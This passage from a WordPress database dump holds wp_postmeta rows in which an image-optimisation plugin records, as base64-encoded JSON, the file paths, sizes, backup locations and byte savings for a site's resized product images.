bGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo1NzEsInRpbWUiOjE0ODM1OTA0OTgsImlkIjo4MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjU3LCJ0aW1lIjoxNDgzNTkwNTAyLCJpZCI6ODF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjg4MCwidGltZSI6MTQ4MzU5MDUwNiwiaWQiOjgxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ1Ytam9pbnRzLTEtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9DVi1qb2ludHMtMS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NWLWpvaW50cy0xLTYwMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDM1LCJ0aW1lIjoxNDgzNTkwNTEwLCJpZCI6ODF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30367, 80, 'wpfc_optimisation_reduction', '11661'); 
INSERT INTO `wp_postmeta` VALUES (30368, 80, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS5qcGciLCJ3aWR0aCI6NDkyOCwiaGVpZ2h0IjozMjY0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTkwNTE0LCJpZCI6IjgwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjUyMywidGltZSI6MTQ4MzU5MDUxOCwiaWQiOjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTgwMHg1MzAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtODAweDUzMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6ODM2LCJ0aW1lIjoxNDgzNTkwNTIyLCJpZCI6ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtNzY4eDUwOS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUwOSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS03Njh4NTA5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTc2OHg1MDkuanBnIiwicmVkdWN0aW9uIjo4NTAsInRpbWUiOjE0ODM1OTA1MjYsImlkIjo4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0xNjAweDEwNjAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0xNjAweDEwNjAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMTYwMHgxMDYwLmpwZyIsInJlZHVjdGlvbiI6MjU2MSwidGltZSI6MTQ4MzU5MDUzMSwiaWQiOjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQ3LCJ0aW1lIjoxNDgzNTkwNTM0LCJpZCI6ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NDYsInRpbWUiOjE0ODM1OTA1MzcsImlkIjo4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ4MiwidGltZSI6MTQ4MzU5MDU0MSwiaWQiOjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NjUxLCJ0aW1lIjoxNDgzNTkwNTQ0LCJpZCI6ODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjUxMCwidGltZSI6MTQ4MzU5MDU0OCwiaWQiOjgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo1ODEsInRpbWUiOjE0ODM1OTA1NTEsImlkIjo4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjkyLCJ0aW1lIjoxNDgzNTkwNTU1LCJpZCI6ODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc4NCwidGltZSI6MTQ4MzU5MDU1OSwiaWQiOjgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMDA4LCJ0aW1lIjoxNDgzNTkwNTYyLCJpZCI6ODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWxfRXBveHktMS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbF9FcG94eS0xLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsX0Vwb3h5LTEtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExOTAsInRpbWUiOjE0ODM1OTA1NjcsImlkIjo4MH1d'); 
INSERT INTO `wp_postmeta` VALUES (30369, 79, 'wpfc_optimisation_reduction', '4114'); 
INSERT INTO `wp_postmeta` VALUES (30370, 79, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS5qcGciLCJ3aWR0aCI6NDUwLCJoZWlnaHQiOjMxOCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLmpwZyIsInJlZHVjdGlvbiI6NDEwNSwidGltZSI6MTQ4MzU5MDU3NCwiaWQiOiI3OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEtMzQweDMxOC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjMxOCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0zNDB4MzE4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTM0MHgzMTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNTc2LCJpZCI6Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNTc4LCJpZCI6Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNTgxLCJpZCI6Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNTgzLCJpZCI6Nzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA1ODUsImlkIjo3OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDU4NywiaWQiOjc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLTEtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNTg5LCJpZCI6Nzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtMS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC0xLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3Rpd